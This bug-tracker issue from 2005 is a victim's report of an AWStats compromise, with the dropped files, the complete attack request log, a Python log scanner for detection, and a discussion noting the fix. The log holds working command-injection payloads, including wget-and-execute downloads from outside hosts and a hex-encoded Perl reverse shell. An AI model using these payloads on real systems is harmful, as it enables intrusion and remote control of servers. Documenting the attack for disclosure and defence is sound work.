
#437 AWSTATS exploit

Status: closed
Group: Other (206)
Priority: 5
Updated: 2015-02-17
Created: 2005-05-09
Creator: Ryan
Private: No

I just found my box hacked thanks to AWSTATS (Revision: 1.751)
running on my system.

To help you figure out which commands actually worked, here's a list
of files I found on the system:
/tmp:
./port.tar
./port
./port/65500
./port/4000
./port/14568
./port/35651
./.dt
./.dt/bind.tgz

/var/tmp:
./.p
./.p/help
./.p/help/ADDLOG.TXT
./.p/help/DELLOG.TXT
./.p/help/LISTLOGS.TXT
./.p/help/PLAYTRAFFICLOG.TXT
./.p/help/PROXY.TXT
./.p/help/SETLEAVEMSG.TXT
./.p/help/SETAWAYNICK.TXT
./.p/help/ADDAUTOOP.TXT
./.p/help/DELAUTOOP.TXT
./.p/help/LISTAUTOOPS.TXT
./.p/help/ACOLLIDE.TXT
./.p/help/ADDALLOW.TXT
./.p/help/ADDASK.TXT
./.p/help/ADDBAN.TXT
./.p/help/ADDDCC.TXT
./.p/help/ADDNETWORK.TXT
./.p/help/ADDOP.TXT
./.p/help/ADDSERVER.TXT
./.p/help/ADDUSER.TXT
./.p/help/BCONNECT.TXT
./.p/help/BHELP.TXT
./.p/help/BKILL.TXT
./.p/help/BQUIT.TXT
./.p/help/BWHO.TXT
./.p/help/DELALLOW.TXT
./.p/help/DELASK.TXT
./.p/help/DELBAN.TXT
./.p/help/DELDCC.TXT
./.p/help/DELENCRYPT.TXT
./.p/help/DELLINK.TXT
./.p/help/DELNETWORK.TXT
./.p/help/DELOP.TXT
./.p/help/DELSERVER.TXT
./.p/help/DELTRANSLATE.TXT
./.p/help/DELUSER.TXT
./.p/help/ENCRYPT.TXT
./.p/help/ERASEMAINLOG.TXT
./.p/help/ERASEPRIVATELOG.TXT
./.p/help/ERASETRAFFICLOG.TXT
./.p/help/JUMP.TXT
./.p/help/LINKFROM.TXT
./.p/help/LINKTO.TXT
./.p/help/LISTALLOW.TXT
./.p/help/LISTASK.TXT
./.p/help/LISTBANS.TXT
./.p/help/LISTDCC.TXT
./.p/help/LISTENCRYPT.TXT
./.p/help/LISTLINKS.TXT
./.p/help/LISTOPS.TXT
./.p/help/LISTSERVERS.TXT
./.p/help/MADMIN.TXT
./.p/help/NAMEBOUNCER.TXT
./.p/help/PASSWORD.TXT
./.p/help/PLAYMAINLOG.TXT
./.p/help/PLAYPRIVATELOG.TXT
./.p/help/RELAYLINK.TXT
./.p/help/SETAWAY.TXT
./.p/help/SETUSERNAME.TXT
./.p/help/SOCKSTAT.TXT
./.p/help/TRANSLATE.TXT
./.p/help/UNADMIN.TXT
./.p/help/VHOST.TXT
./.p/help/SETLINKKEY.TXT
./.p/help/SETUSERKEY.TXT
./.p/help/RELINK.TXT
./.p/help/DCCCHAT.TXT
./.p/help/DCCANSWER.TXT
./.p/help/DCCSEND.TXT
./.p/help/DCCGET.TXT
./.p/help/DCCCANCEL.TXT
./.p/help/BREHASH.TXT
./.p/help/SRELOAD.TXT
./.p/help/LISTTASKS.TXT
./.p/help/SWITCHNET.TXT
./.p/help/DCCENABLE.TXT
./.p/help/AIDLE.TXT
./.p/help/AUTOREJOIN.TXT
./.p/help/LEAVEQUIT.TXT
./.p/log
./.p/log/INFO
./.p/log/psybnc.log
./.p/log/USER1.TRL
./.p/log/USER2.TRL
./.p/log/psybnc.log.old
./.p/log/USER3.TRL
./.p/motd
./.p/motd/INFO
./.p/motd/USER1.MOTD
./.p/motd/USER1.MOTD.old
./.p/motd/USER2.MOTD
./.p/motd/USER2.MOTD.old
./.p/motd/USER3.MOTD
./.p/motd/USER3.MOTD.old
./.p/psybnc.conf
./.p/psybncchk
./.p/scripts
./.p/scripts/INFO
./.p/scripts/example
./.p/scripts/example/DEFAULT.SCRIPT
./.p/httpd
./.p/psybnc.pid

Here is the complete list of URLs they ran to exploit my system.

---- snip -----
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/perl/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET /cgi-bin/awstats.pl HTTP/1.1"
"GET /awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/perl/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/cgi-bin/| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/awstats/| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/cgi-bin/| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/awstats/| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/awstats| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|awstats| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|cgi-bin| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|awstats| HTTP/1.1"
"GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;echo%20;echo| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;echo%20;echo| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/perl/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //cp/awstats/awstats.pl HTTP/1.1"
"GET //awstats/perl/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET /cgi-bin/awstats.pl?configdir=|ls| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|ls| HTTP/1.1"
"GET /awstats/?configdir=|ls| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?update=1&logfile=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?pluginmode=:system(\"%20id%20\") HTTP/1.1"
"GET //cgi-bin/awstats.pl?update=1&logfile=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?pluginmode=:system(\"%20id%20\") HTTP/1.1"
"GET //cgi/awstats.pl?update=1&logfile=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?pluginmode=:system(\"%20id%20\") HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //cp/awstats/awstats.pl HTTP/1.1"
"GET //awstats/perl/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET /cgi-bin/awstats.pl HTTP/1.0"
"GET /cgi-bin/awstats.pl HTTP/1.1"
"GET /awstats/awstats.pl HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx23%5Cx21%5Cx2f%5Cx75%5Cx73%5Cx72%5Cx2f%5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx70%5Cx65%5Cx72%5Cx6c%5Cx0a%5Cx75%5Cx73%5Cx65%5Cx20%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx3b%5Cx20%5Cx75%5Cx73%5Cx65%5Cx20%5Cx49%5Cx4f%5Cx3a%5Cx3a%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx3b%5Cx20%5Cx75%5Cx73%5Cx65%5Cx20%5Cx50%5Cx4f%5Cx53%5Cx49%5Cx58%5Cx3b%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx20%5Cx3d%5Cx20%5Cx67%5Cx65%5Cx74%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx62%5Cx79%5Cx6e%5Cx61%5Cx6d%5Cx65%5Cx28%5Cx27%5Cx74%5Cx63%5Cx70%5Cx27%5Cx29%5Cx3b%5C%22%22%20%3E/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2c%5Cx20%5Cx41%5Cx46%5Cx5f%5Cx49%5Cx4e%5Cx45%5Cx54%5Cx2c%5Cx20%5Cx53%5Cx4f%5Cx43%5Cx4b%5Cx5f%5Cx53%5Cx54%5Cx52%5Cx45%5Cx41%5Cx4d%5Cx2c%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx29%5Cx3b%5Cx20%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx20%5Cx3d%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx6b%5Cx61%5Cx64%5Cx64%5Cx72%5Cx5f%5Cx69%5Cx6e%5Cx28%5Cx33%5Cx31%5Cx30%5Cx33%5Cx32%5Cx2c%5Cx69%5Cx6e%5Cx65%5Cx74%5Cx5f%5Cx61%5Cx74%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx6f%5Cx6e%5Cx28%5Cx22%5Cx32%5Cx31%5Cx38%5Cx2e%5Cx31%5Cx38%5Cx39%5Cx2e%5Cx32%5Cx31%5Cx36%5Cx2e%5Cx31%5Cx38%5Cx31%5Cx22%5Cx29%5Cx29%5Cx3b%5Cx20%5Cx63%5Cx6f%5Cx6e%5Cx6e%5Cx65%5Cx63%5Cx74%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2c%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx29%5Cx3b%5Cx20%5Cx64%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx30%5Cx29%5Cx3b%5Cx20%5Cx64%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx31%5Cx29%5Cx3b%5Cx20%5Cx64%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx32%5Cx29%5Cx3b%5Cx20%5Cx65%5Cx78%5Cx65%5Cx63%5Cx20%5Cx7b%5Cx20%5Cx22%5Cx2f%5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx73%5Cx68%5Cx22%5Cx20%5Cx7d%5Cx20%5Cx22%5Cx22%5Cx3b%5Cx0a%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|chmod%20755%20/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|exec%20/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|rm%20%2Df%20/var/tmp/.vetx.95| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bw%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bw%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20madnuker%2ego%2ero%2fport%2etgz%3btar%20xvzf%20port%2etgz%3bcd%20port%3bchmod%20%2bx%2014568%3b%2e%2f14568%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET /cgi-bin/awstats.pl HTTP/1.0"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;cat%20awstats.pl;echo%20;echo| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cat%20awstats.pl;echo%20;echo| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //cp/awstats/awstats.pl HTTP/1.1"
"GET //awstats/perl/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|echo;echo+DTORS_START;id;echo+DTORS_STOP;echo| HTTP/1.0"
"GET /awstats/awstats.pl?configdir=|echo;echo+DTORS_START;w;echo+DTORS_STOP;echo| HTTP/1.0"
"GET /awstats/awstats.pl?configdir=|echo;echo+DTORS_START;uname%20-a;echo+DTORS_STOP;echo| HTTP/1.0"
"GET /awstats/awstats.pl?configdir=|echo;echo+DTORS_START;cd%20/tmp;mkdir%20.dt;cd%20.dt;wget%20diez.go.ro/bind.tgz;tar%20xzvf%20bind.tgz;ls;chmod%20+x%20bind;mv%20bind%20imapd;PATH=.:$PATH;imapd%20%20;echo+DTORS_STOP;echo| HTTP/1.0"
"GET //cgi-bin/awstats/awstats.pl \"w;wget\" HTTP/1.1"
"GET //cgi-bin/awstats.pl \"w;wget\" HTTP/1.1"
"GET //cgi/awstats.pl \"w;wget\" HTTP/1.1"
"GET //cgi/awstats/awstats.pl \"w;wget\" HTTP/1.1"
"GET //awstats/awstats.pl \"w;wget\" HTTP/1.1"
"GET //awstats.pl \"w;wget\" HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bw%3bwget%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3bwget%20www%2elocalhost%2ehome%2ero%2fsunpsy%2etar%3bls%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3btar%20xvf%20sunpsy%2etar%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3bls%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3brm%20%2drf%20sunpsy%2etar%3bmv%20psybnc%20%2ep%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3bls%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%2f%2ep%3bls%20%2da%20%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%2f%2ep%3bmv%20pine%20httpd%3bexport%20PATH%3d%3a%3a%2fusr%2flocal%2fsbin%3a%2fusr%2fsbin%3a%2fsbin%3a%2fusr%2fbin%3a%2fbin%3a%2flib%2fsecurity%2f%2econfig%2fbin%3a%2fusr%2fX11R6%2fbin%3bhttpd%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%2f%2ep%3b%2e%2fhttpd%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
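As an added example (not part of the original report or of AWStats itself), the following Python script runs the detection a defender would want over Apache access-log lines: it flags the request shapes visible in the log above, namely a configdir or logfile value wrapped in shell pipes (`|%20id%20|`, `%7c...`), a pluginmode value that is Perl code rather than a plugin name, and the double-encoded NUL (`%2500`) used to truncate the rest of the value. The sample log lines, client IPs, timestamps and user agents are constructed for the example; only the request strings are taken from the report.

```python
"""Scan Apache access-log lines for AWStats command-injection attempts.

Flags the request shapes seen in the report: a configdir/logfile value
containing a shell pipe, a pluginmode value that is not a plain plugin
name, and an encoded or double-encoded NUL byte in any parameter.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines in Apache combined format. The request
# strings reuse the patterns quoted in the report; the client IPs,
# timestamps, sizes and user agents are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [09/May/2005:03:12:01 -0400] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [09/May/2005:03:12:02 -0400] "GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1" 200 688 "-" "Mozilla/4.0"
203.0.113.7 - - [09/May/2005:03:12:03 -0400] "GET //cgi-bin/awstats.pl?pluginmode=:system(\\"%20id%20\\") HTTP/1.1" 200 301 "-" "Mozilla/4.0"
203.0.113.7 - - [09/May/2005:03:12:04 -0400] "GET //cgi-bin/awstats.pl?update=1&logfile=|%20id%20| HTTP/1.1" 200 301 "-" "Mozilla/4.0"
198.51.100.5 - - [09/May/2005:03:15:10 -0400] "GET /awstats/awstats.pl?config=example.com&output=main HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
198.51.100.5 - - [09/May/2005:03:15:11 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Apache combined log format. The request target is everything between the
# method and the trailing " HTTP/x.y", so targets containing spaces (the
# report has some) still parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameters the report's log shows being abused with pipe-wrapped commands.
PIPE_PARAMS = ("configdir", "logfile")
# A legitimate pluginmode is a bare identifier; anything else is code.
PLUGIN_NAME_RE = re.compile(r"[A-Za-z0-9_]*")


def parse_query(query):
    """Split a raw query string into (name, value) pairs, decoding each side
    once. Only '&' separates parameters, so a ';' inside a value (the shell
    command separator the attacker relies on) stays part of that value."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def classify(target):
    """Return the reasons a request target looks like an AWStats injection
    attempt; an empty list means nothing suspicious was found."""
    path, _, query = target.partition("?")
    if "awstats" not in path.lower():
        return []
    reasons = []
    for name, value in parse_query(query):
        if name in PIPE_PARAMS and "|" in value:
            reasons.append(f"{name} contains a shell pipe '|'")
        if name == "pluginmode" and not PLUGIN_NAME_RE.fullmatch(value):
            reasons.append("pluginmode is not a plain plugin name")
        # %2500 decodes to %00 on the first pass and to a real NUL on the
        # second; either form is a truncation trick, never legitimate input.
        if "\x00" in value or "\x00" in unquote(value):
            reasons.append(f"{name} carries an encoded NUL byte")
    return reasons


def scan_log(text):
    """Parse each log line and return the flagged ones as dicts with ip,
    timestamp, target and reasons; lines that do not parse are skipped."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m.group("target"))
        if reasons:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "target": m.group("target"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['target']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the per-IP grouping of hits is what tells you which client worked through the path-guessing sequence seen in the report. Decoding once per side rather than relying on a query parser keeps the `;` separators inside the value, and the second `unquote` catches the `%2500` trick that a single decode would miss.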

Discussion

  • Ryan McKay

    Ryan McKay - 2005-05-09

    Logged In: YES
    user_id=927052

    We just got hit by a very similar attack, using the
    configdir parameter to run a series of commands.

     
  • Ryan McKay

    Ryan McKay - 2005-05-09

    Logged In: YES
    user_id=927052

    Sorry, following up on that previous comment: our version is
    ancient, 1.605, it's probably fixed by now.

     
  • Ryan

    Ryan - 2005-05-10

    Logged In: YES
    user_id=573272

    ryanmckay: The version I was running was version 1.751. So it could still
    exist... I'm not going to use this program any more, but it would be good
    for people to be notified of this issue. It looks like a worm is worming the
    internet ....

     
  • bin-doph

    bin-doph - 2005-05-10

    Logged In: YES
    user_id=1072572

    Hi,

    we have been attacked by a similar attack. Restricting the
    access to the script to known IP addresses solves this issue
    for us, but it should be fixed anyway...

    cheers

     
  • DataBoy

    DataBoy - 2005-05-17

    Logged In: YES
    user_id=1270046

    We had a server attacked and toasted due to AWSTATs too.

    So much for the highly secure nature of open source.

     
  • Anonymous

    Anonymous - 2005-05-27

    Logged In: YES
    user_id=937105

    I just got hit as well.

    [26/May/2005:19:04:39 -0600] GET /awstats/awstats.pl?configdir=|echo ;cd /tmp;wget www.fermedorlou.be/sess_3539283e27d73cae29fe2b80f9293f60;perl sess_3539283e27d73cae29fe2b80f9293f60;echo ;echo|

    I'm running 6.2 (build 1.771).

    Is this exploit fixed in the latest version?

     
  • Laurent Destailleur (Eldy)

    Logged In: YES
    user_id=96898

    AWStats security hole was fixed with 6.4 release.

     
  • Robert Kolatzek

    Robert Kolatzek - 2005-10-24

    Logged In: YES
    user_id=554119

    New bot
    "User-Agent: DataCha0s/2.0"
    searches for
    "GET /cgi-bin/awstats.pl?configdir=|echo;echo;id;%00"

    secure your server with apache-mod_secure

     
